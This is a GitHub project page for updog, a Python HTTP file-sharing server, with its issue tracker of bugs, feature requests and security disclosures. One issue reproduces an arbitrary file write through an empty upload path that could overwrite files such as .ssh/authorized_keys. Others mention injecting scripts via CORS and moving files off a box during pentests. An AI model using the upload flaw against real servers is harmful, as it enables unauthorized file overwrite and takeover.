sc0tfree / updog

Updog is a replacement for Python's SimpleHTTPServer. It allows uploading and downloading via HTTP/S, can set ad hoc SSL certificates and use http basic auth.

License: MIT License

Python 49.20% CSS 28.26% JavaScript 4.04% HTML 18.50%
file-sharing file-upload http-server https-server simplehttpserver

updog's Issues

Potential Security Issues

Hello 👋

I just wanted to let you know that we received multiple vulnerability disclosures against your repository through our disclosure program. I tried looking for a contactable e-mail on your repository and for a security process, but could not find either - hence the issue.

You can view the details for each:

https://huntr.dev/bounties/1-sc0tfree/updog/
https://huntr.dev/bounties/2-sc0tfree/updog/
https://huntr.dev/bounties/3-sc0tfree/updog/
https://huntr.dev/bounties/4-sc0tfree/updog/
https://huntr.dev/bounties/5-sc0tfree/updog/

The reports are private to you and the reporter. If you would prefer not to sign-up, let me know a preferred method to deliver the contents of the disclosures, and I will be happy to send them over to you.

-- Jamie from huntr.dev

Trying to get in touch with you regarding a security issue

Hi there,

I couldn't find a SECURITY.md in your repository and so am not sure how to best contact you privately to disclose the security issue.

Can you add a SECURITY.md file with your e-mail to your repository, so that I know who to contact? GitHub suggests that a security policy is the best way to make sure security issues are responsibly disclosed.

Once you've done that, please let me know so I can ping you the info.

Thanks! (cc @JamieSlome)

Dead Symlink Handling

Updog listing explodes if it's asked to list a directory containing a dead symlink.

To reproduce:

  1. Create a directory with a dead symbolic link (ln -s super-dead dead-link)
  2. View directory in Updog.

Internal Server Error

Error: Internal Server Error when browsing to http://127.0.0.1:9090/ . Changed port, same. python ./setup install completed without issues.
Server itself outputs: "127.0.0.1 - - [03/Dec/2020 09:43:48] "GET / HTTP/1.1" 500 -"

WebDAV needed

Less an issue more a feature request: I would love to see WebDAV be added to updog so versatility goes up the wall!

I love the tool!

Allow CORS headers to be sent

First of all thanks for the great tool being a really nice replacement for http.server on steroids 👍

One thing I'd love to have is the support for CORS headers / enabling CORS for the server.

Background:
In some places I'd like to maybe serve a small script or similar to a web page (e.g. to inject some arbitrary code). However, browsers will block loading the resource if the server does not send appropriate CORS headers.

Potential solution:
Since updog uses Flask it might be as easy as to bring in https://github.com/corydolphin/flask-cors and add an additional command line argument, e.g. --cors to enable this behavior (as an opt-in).

If you in general agree on this being a good idea I could come up with a PR.

Downside:
It would increase the list of dependencies of updog to include flask-cors and make the installation bigger.

File Permission Error Handling

The Updog listing 403's if given a directory with a symbolic link to an inaccessible file.

To reproduce:

  1. Create a directory with a dead symbolic link on account of the destination being unreachable. I discovered this browsing my /etc directory, which had a symlink to something walled off to my user in /boot.
  2. View directory in Updog.

Expected behavior is that only the affected path should be affected, not the parent directory with the link.
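
An added example, not taken from the two symlink reports above or from updog's own code: a directory listing that stats each entry separately, so a dead link or an unreadable target marks only that entry instead of failing the whole page. The function name and the status labels are hypothetical.

```python
import os
import stat
import tempfile


def list_directory(path):
    """List `path`, isolating per-entry failures from the rest of the listing."""
    entries = []
    with os.scandir(path) as it:
        for entry in it:
            info = {"name": entry.name, "status": "ok",
                    "is_dir": False, "size": None}
            try:
                st = entry.stat()  # follows symlinks, so a bad target raises here
                info["is_dir"] = stat.S_ISDIR(st.st_mode)
                info["size"] = st.st_size
            except FileNotFoundError:
                # Link target is missing, or the entry vanished after scandir.
                info["status"] = ("broken-link" if entry.is_symlink()
                                  else "vanished")
            except PermissionError:
                # Target sits behind a directory this user cannot traverse.
                info["status"] = "unreadable"
            except OSError:
                # Anything else, e.g. a symlink loop (ELOOP).
                info["status"] = "error"
            entries.append(info)
    return sorted(entries, key=lambda e: e["name"])


if __name__ == "__main__":
    # Constructed sample directory: one regular file and one dead symlink,
    # created the same way as in the reproduction steps (ln -s super-dead dead-link).
    demo = tempfile.mkdtemp()
    with open(os.path.join(demo, "ok.txt"), "w") as fh:
        fh.write("hi")
    os.symlink("super-dead", os.path.join(demo, "dead-link"))
    for row in list_directory(demo):
        print(row)
```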

Win10: CMD hangs on CTRL+C event after GET request

Starting the server with "updog" allows stopping the server with CTRL+C. However, after navigation and subsequent console output, the terminal hangs when attempting to capture CTRL+C event. The delay seems to be coupled with some internal I/O block and does not properly listen for the stop signal.

Steps to generate SSL Certificates

I get a NET::ERR_CERT_AUTHORITY_INVALID on Chrome.
Command used: updog -d . -p 8000 --ssl

Do I need to generate the SSL certificate and set it somewhere manually? If so, can you give me the steps on how to do that so it'll work with updog? Or is it the same as how you would do it with SimpleHTTPServer? (I've never used SSL on SimpleHTTPServer)

Updog command not found

In a fresh Ubuntu env I installed pip3, then pip3 install updog (which succeeded without errors) and then when I try and run "updog" I get command not found :(

[enhancement] Function to download entire directories as zip archives

Would it be possible to add functionality to download directories as zip archives? As of now we have to zip the directory on the host and then run updog one level higher. It would be nice to run updog in a directory and be able to download all the contents of the given directory.

Feature Request: CLI File Upload (Wget & Curl)

Here is an awesome feature request that would add massive pentest value.

I would like to be able to use curl and wget to upload files from Linux boxes to my updog web server. This is great for when you have shell but no browser access and want an easy way to transfer files. Curl and Wget both these methods just need updog to support receiving them.

"POST / HTTP/1.1" 405 -

Hi,
every time I'm trying to upload:

curl -F '[email protected];filename=header.cap' http://127.0.0.1:9090/ -v
                                
*   Trying 127.0.0.1:9090...
* Connected to 127.0.0.1 (127.0.0.1) port 9090 (#0)
> POST / HTTP/1.1
> Host: 127.0.0.1:9090
> User-Agent: curl/7.74.0
> Accept: */*
> Content-Length: 804
> Content-Type: multipart/form-data; boundary=------------------------3c87d2a52649c76a
> 
* We are completely uploaded and fine
* Mark bundle as not supporting multiuse
* HTTP 1.0, assume close after body
< HTTP/1.0 405 METHOD NOT ALLOWED
< Content-Type: text/html; charset=utf-8
< Allow: GET, HEAD, OPTIONS
< Content-Length: 178
< Server: Werkzeug/1.0.1 Python/3.9.2
< Date: Sat, 20 Mar 2021 14:29:35 GMT
< 
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>405 Method Not Allowed</title>
<h1>Method Not Allowed</h1>
<p>The method is not allowed for the requested URL.</p>
* Closing connection 0

and from server side I get:

updog -p 9090

[+] Serving /home...
 * Running on http://0.0.0.0:9090/ (Press CTRL+C to quit)
127.0.0.1 - - [20/Mar/2021 10:29:35] "POST / HTTP/1.1" 405 -

What am I doing wrong?

Vulnerability: Arbitrary file write in CWD

Assume you are in the directory ~/cwd and you do updog -d $(readlink -f ~/www). A POST to /upload with an empty path parameter will upload the file to ~/cwd instead of ~/www

~% mkdir ~/www ~/cwd

~% cd ~/cwd

~/cwd% ~/.local/bin/updog -d $(readlink -f ~/www) &
[1] 4124
~/cwd]% [+] Serving /home/justin/www...
 * Running on http://0.0.0.0:9090/ (Press CTRL+C to quit)

~/cwd% ls issue
ls: cannot access 'issue': No such file or directory

~/cwd% curl -v http://127.0.0.1:9090/upload -F 'file=@/etc/issue' -F 'path='
* Expire in 0 ms for 6 (transfer 0x5585447baf90)
*   Trying 127.0.0.1...
* TCP_NODELAY set
* Expire in 200 ms for 4 (transfer 0x5585447baf90)
* Connected to 127.0.0.1 (127.0.0.1) port 9090 (#0)
> POST /upload HTTP/1.1
> Host: 127.0.0.1:9090
> User-Agent: curl/7.64.0
> Accept: */*
> Content-Length: 317
> Content-Type: multipart/form-data; boundary=------------------------286bd5dc6119e79d
>
127.0.0.1 - - [19/Feb/2020 12:22:22] "POST /upload HTTP/1.1" 302 -
* HTTP 1.0, assume close after body
< HTTP/1.0 302 FOUND
< Content-Type: text/html; charset=utf-8
< Content-Length: 207
< Location: http://127.0.0.1:9090/None
< Server: Werkzeug/1.0.0 Python/3.7.6
< Date: Wed, 19 Feb 2020 01:22:22 GMT
<
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>Redirecting...</title>
<h1>Redirecting...</h1>
* Closing connection 0
<p>You should be redirected automatically to target URL: <a href=""></a>.  If not click the link.

~/cwd% ls issue
issue

~/cwd% cat issue
Debian GNU/Linux 10 \n \l

If the user is in ~ or another interesting directory at the time of doing updog -d /some/other/directory then a remote attacker can overwrite interesting files such as .ssh/authorized_keys

Serving "/" leads to miss the first letter of directory

As stated, when I try to run updog from root or if I do updog -d / or updog -d \/, all links in http interface seem to miss their first letter, like /etc becomes 0.0.0.0:9090/tc and so on

To reproduce:

  • updog -d /
  • open web interface
  • see what is a http link to /etc - it would be /tc

Upload-only mode

I would appreciate an upload-only mode. Just like https://github.com/stackp/Droopy. But don't make it the default (like Droopy does). I guess default should be #3.

So two new flags:

--allow-upload
--upload-only

Thanks for the great tool, btw. ;)

Add Dockerfile

I wrote one already, it works for me, maybe it will help others 😙

FROM python:3.8-alpine

WORKDIR /uploads
VOLUME /uploads

RUN apk add gcc musl-dev libffi-dev openssl-dev

RUN pip install updog

EXPOSE 9090

CMD ["updog"]

I think it should be better if instead of pip installing it installed the requirements.txt, but I wrote it this way and it works 😅

ImportError for jinja2 on Python 3.10

Updog is functional on 3.11 but when trying to run on 3.10.x, I receive the following error

> updog
Traceback (most recent call last):
  File "C:\Users\consultant\.pyenv\pyenv-win\versions\3.10.5\lib\runpy.py", line 196, in _run_module_as_main
    return _run_code(code, main_globals, None,
  File "C:\Users\consultant\.pyenv\pyenv-win\versions\3.10.5\lib\runpy.py", line 86, in _run_code
    exec(code, run_globals)
  File "C:\Users\consultant\.pyenv\pyenv-win\versions\3.10.5\Scripts\updog.exe\__main__.py", line 4, in <module>
  File "C:\Users\consultant\.pyenv\pyenv-win\versions\3.10.5\lib\site-packages\updog\__main__.py", line 5, in <module>
    from flask import Flask, render_template, send_file, redirect, request, send_from_directory, url_for, abort
  File "C:\Users\consultant\.pyenv\pyenv-win\versions\3.10.5\lib\site-packages\flask\__init__.py", line 19, in <module>
    from jinja2 import Markup, escape
ImportError: cannot import name 'Markup' from 'jinja2' (C:\Users\consultant\AppData\Roaming\Python\Python310\site-packages\jinja2\__init__.py)

Connection timed out Error

I'm clueless why I can not access server????

And when I try to connect to the server ---- connection timed out Error

Using VPN IP Address rather than host

Hi,
Just seen this as a tool and would love to use it. However, when I start it, the default is my host IP. When I use HTB and THM, there is obviously a VPN link and a new address. From the help I could not see a way of engaging options to have that IP used instead.
Any pointers appreciated.
K

Infinite loop if target directory vanishes.

Steps to reproduce:

  1. Run Updog on a directory.
  2. While Updog is running, remove/rename the directory.
  3. Visit Updog in a browser. The browser will be told it isn't redirecting properly.

Allow Custom SSL-Certificates

I suggest to add a command-line option to allow setting a custom SSL-certificate.
ssl_context can be set with a tuple of (certificate.pem, key.pem).
When using Let's Encrypt you are provided with fullchain.pem and privkey.pem.
I suggest a command-line option like this:
updog --ssl-cert fullchain.pem --ssl-key privkey.pem

Kali upgrade issue

Hi there,

This may be an issue with me rather than updog so maybe some guidance would be great. When I upgrade Kali all of a sudden when I try to run updog I get this issue pictured. It also happens with other python tools like Autorecon so it is not entirely an Updog problem. Have you any guidance on how best to install it to avoid this issue? Maybe clone the repository and just call a python file directly every time rather than expect it to run by just typing updog or something although to be honest I like that simplicity.....

Thanks

interface problem

Whenever I start updog the interface is eth0 where I need tun0. How can I change it?

Could not enter sub folder

Win10 python 3.7 X64
Both these could not get in D:\Test

updog -d D:\\  -p 1920
updog -d D:\  -p 1921

In chrome if get http://127.0.0.1:1920/Test will hit http://127.0.0.1:1920/est

But this works

cd /d D:\
updog -p 1922

Read-only mode

Hi! As name suggests, I think it would be nice to have a --read-only/--no-upload/... switch that disables the upload functionality. What do you think?

Updog is not listening on IPv6 address

My VPS is dual stack with both IPv4 & IPv6. While I successfully deployed updog, it turns out that updog is accessible only with IPv4; any attempt at accessing with IPv6 will end up with the alert that says: ERR_CONNECTION_REFUSED.
And I checked netstat -tunlp, which confirms the problem: the process is only listening on 0.0.0.0, not on ::, so it won't work on IPv6.
Hopefully you can work this out, thanks.

`-d` doesn't work with relative paths

Doing updog -d with a relative path causes breakage in is_valid_subpath() and hence nothing really works.

e.g.

Does not work:

% mkdir www

% echo "hello world" > www/hello.txt

% updog -d www &
[1] 4001            
% [+] Serving www...
 * Running on http://0.0.0.0:9090/ (Press CTRL+C to quit)

% curl 127.0.0.1:9090/hello.txt
127.0.0.1 - - [19/Feb/2020 12:10:34] "GET /hello.txt HTTP/1.1" 200 -

<!DOCTYPE html>
<html lang="en">
<head>
    <!-- Meta tags -->
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, shrink-to-fit=no">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <!-- Title -->
    <title>updog - www</title>

[... SNIP - home page is returned ...]

Works:

% kill %1
[1]  + terminated  ~/.local/bin/updog -d www

% ~/.local/bin/updog -d $(readlink -f www) &
[1] 4019
% [+] Serving /home/justin/www...
 * Running on http://0.0.0.0:9090/ (Press CTRL+C to quit)

% curl 127.0.0.1:9090/hello.txt
127.0.0.1 - - [19/Feb/2020 12:12:06] "GET /hello.txt HTTP/1.1" 200 -

hello world
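
An added example, not taken from the reports or from updog's own code: one containment check that covers both this relative `-d` report and the earlier "Arbitrary file write in CWD" report, by canonicalising the served directory and always joining the client-supplied path onto it. The names `naive_target` and `safe_target` are hypothetical, and the naive version is a constructed illustration of the failure mode, not updog's upload handler.

```python
import os
import tempfile


def naive_target(user_path, filename):
    """Constructed 'before' version: joins the request fields as given.

    An empty user_path yields a bare relative filename, which the OS
    resolves against the process's working directory, not the served one.
    """
    return os.path.join(user_path, filename)


def safe_target(base_dir, user_path, filename):
    """Return an absolute upload path guaranteed to sit under base_dir."""
    # Canonicalise the served directory: absolute, symlinks resolved.
    # This also makes a relative `-d www` style argument comparable.
    base = os.path.realpath(base_dir)
    # Treat the client path as relative to base, even if empty or absolute.
    rel = (user_path or "").replace("\\", "/").lstrip("/")
    # Keep only the final component of the client-supplied filename.
    name = os.path.basename(filename.replace("\\", "/"))
    if name in ("", ".", ".."):
        raise ValueError("invalid filename")
    target = os.path.realpath(os.path.join(base, rel, name))
    # commonpath compares whole components, unlike a startswith() prefix test.
    if os.path.commonpath([base, target]) != base:
        raise ValueError("path escapes the served directory")
    return target


if __name__ == "__main__":
    # Constructed layout mirroring the report: serve ~/www while sitting in ~/cwd.
    root = os.path.realpath(tempfile.mkdtemp())
    www, cwd = os.path.join(root, "www"), os.path.join(root, "cwd")
    os.mkdir(www)
    os.mkdir(cwd)
    os.chdir(cwd)
    print("naive :", os.path.abspath(naive_target("", "issue")))
    print("safe  :", safe_target(www, "", "issue"))
    for bad in ("../cwd", "../../etc"):
        try:
            safe_target(www, bad, "issue")
        except ValueError as exc:
            print("reject:", bad, "->", exc)
```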

Flag for disabling directory listing

If I were to use this as an upload/download file server, I don't necessarily want everyone I share the link with to be able to see all files.
A simple --no-listing would be great :)

avoid leaking full directory path

I think it would be useful to disable leaking the full directory path in the upper label.
if the server's owner decides to point updog to a certain folder, that should be the root of the webserver, full stop.

e.g. in the main example:

Directory: /home/sc0tfree

vs. something like:

Directory: /

I will never want to disclose the real path of the folder in which updog operates, but if somebody else believes otherwise, then this could be an option, rather than a hardcoded change.

EDIT: also, this "chrooted" behavior is more in line with python's http.server than displaying the full directory listing.

Not exactly a replacement

Nice project, I'm just not sure the current description is really the best for it.
Because that's true I sometimes use "python3 -m http.server" to download files from another PC but more than half of my recent usages are for quickly serving my hugo powered blog static files.

I tried with updog to serve a folder including an index.html file but by default it's always showing listing view, and if "View in Browser" button is rendering correctly the HTML, click a link is showing again the default view. That's not really what I'm expecting from a SimpleHTTPServer replacement.

Also another quick feedback: have to provide -d for overriding default folder is annoying, better promote it as an optional positional argument.

sharex

is it possible to make sharex config for it?

Response Colouring

Hi,

First of all I love this tool and I use it daily. There is probably a simple "fix" for this question but I thought you could help me out.
I notice that when a file is grabbed successfully with a 200 response the font is white and when it fails with a 302 response it is green.

I find this confusing so I want green for the successful 200 responses and red for the 302 responses indicating they require attention.

How is this achieved please?

Thanks again
